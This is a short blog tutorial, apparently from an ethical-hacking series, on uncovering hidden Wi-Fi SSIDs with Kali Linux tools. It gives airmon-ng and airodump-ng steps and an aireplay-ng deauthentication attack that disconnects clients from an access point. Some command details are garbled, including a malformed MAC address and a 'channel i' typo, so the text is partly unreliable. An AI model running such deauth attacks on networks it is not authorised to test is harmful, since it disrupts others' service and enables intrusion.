>> Welcome all, to this series of Kali Linux for Ethical Hacking. This is second part and we’ll be seeing some of the techniques of uncovering hidden SSIDs.
# Process
– Enabling Wireless Monitoring : airmon-ng
– Discovering the APs (Access Points) : airodump-ng
– Stay calm for Association or use de-authentication : aireplay-ng
# . . . Let’s Begin
– Before start, make sure that you have eth0, lo, wlan0 are in action. (go to terminal and run ifconfig)
– Let’s start to monitor on that wireless interface, run:
airmon-ng start wlan0
– After executing above command, we must get a new interface mon0 (monitor mode enabled)
– Verify that both interfaces are up and running, run:
airmon-ng
– Watch for wlan0 and mon0, run:
airodump-ng mon0
– For monitoring all the APs that Kali Linux OS can find out.
– From next step, note BSSID and ESSID, if there is any hidden SSID, then ESSID will be format like this : <length: 0> [Notice, it’s CH (Channel) and BSSID]
– CTRL+C (press)
airodump-ng -c 1 mon0
(Here, 1 is channel we notice/you notice. This value may differ.)
– After some time, you will notice <length: 0> changes and reveals SSID name.
– If it takes lot of time to reveal SSID, we can follow de-authenticate process by cloning next terminal in Kali Linux.
– Copy BSSID (MAC) of ch 1
#Deauth Attack:
aireplay-ng -0 2 -a 00:A1:B2:11:20:13:5T mon0
– It sends de-auth to broadcast
airodump-ng -c i mon0
– Wait
– Go over to new Terminal
aireplay-ng -0 2 -a 00:A1:B2:11:20:13:5T mon0
– Finally you will get SSID in ESSID section.
No comments:
Post a Comment